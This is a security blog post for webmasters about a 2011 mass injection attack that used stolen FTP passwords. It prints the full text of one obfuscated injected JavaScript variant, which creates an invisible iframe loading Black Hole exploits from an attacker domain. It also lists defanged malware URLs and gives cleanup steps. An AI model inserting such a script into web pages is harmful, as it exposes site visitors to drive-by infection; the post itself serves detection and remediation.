Unmask Parasites - Check your web pages for hidden links, iframes, malicious scripts, unauthorized redirects and other signs of security problems.
Loading site search ...

Massive Script Injection (k985ytv)

   23 Aug 11   Filed in Short Attack Reviews

I’d like to point webmasters at a great article on the Armorize blog. It is about a new massive script injection attack that seems to have affected a few thousand websites. In my post, I will summarize the information specifically for webmasters.

It all began about a week ago and I still see quite a few infected sites. Attackers use stolen FTP passwords to inject malicious scripts into selected legitimate web pages on compromised sites. The targeted files usually have the following words in their names: index, home, default, auth, login.

The scripts can be injected right after the <body> tag or at the very top or bottom of the HTML code. As the Armorize article shows, the first wave of the injection was buggy and you might find the script text displayed on your web pages.

Hackers update the malicious scripts every day. If you clean up your site but don’t change passwords, you’ll find your site reinfected quite soon. Because of a buggy implementation of the script updater, one page can contain multiple instances of the malicious scripts (I’ve seen 8 scripts on the same page).

At this point, I know about 5 variations of the injected script:

wa='t';p='ht'; f='k98';tb ='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(t b);oz=v.concat(k);db=p concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=docu ment.createEl ement(se);ip.setAttribute('width','1');ip.setAttr ibute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body appendChild(ip);





All 5 variants are can be easily detected with Unmask Parasites:

k985ytv detected

The script creates invisible iframes that load browser exploits (Black Hole) from the following sites:

  • hxxp://zirycatum .com/k985ytv.htm
  • hxxp://cubyfonizi .com/k985ytv.htm
  • hxxp:// numudozaf .com/k985ytv.htm
  • hxxp://hysofufewobe .com/k985ytv.htm
  • hxxp://rewajuseva .com/k985ytv.htm

Google blacklists infected sites. Their Safe Browsing diagnostic pages typically say something like this:

Malicious software is hosted on 4 domain(s), including dddnvf .com/, rprlpb .com/, numudozaf .com/.

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including zirycatum .com/, numudozaf .com/.


1. Scan all computers that have access to your website for malware.

2. Change all site passwords. Don’t save new passwords in FTP programs. Configure them so that they ask for a password every time you connect to your site. If you work with multiple sites and don’t like the idea of memorizing many passwords, consider using password managers like KeePass — they save your passwords much more securely. Remove stored passwords from FTP programs that you no longer use.

3. Consider using SFTP instead of FTP that sends your passwords in plain text (they can be intercepted by malware on your computer and from third-party computers when you use Wi-Fi). Most popular FTP programs support SFTP, so the switch should be painless.

4. Remove malicious scripts from files on server. The easiest way to do it is to restore your site from a clean fresh backup copy.

4. If your site is blacklisted by Google, request a malware review via Google Webmaster Tools (Diagnostics->Malware).

Related posts:

Reader's Comments (%)

  1. |

    […] Sinegubko adviseert webmasters om alle computers die toegang tot hun websites hebben op malware te scannen. Verder moet […]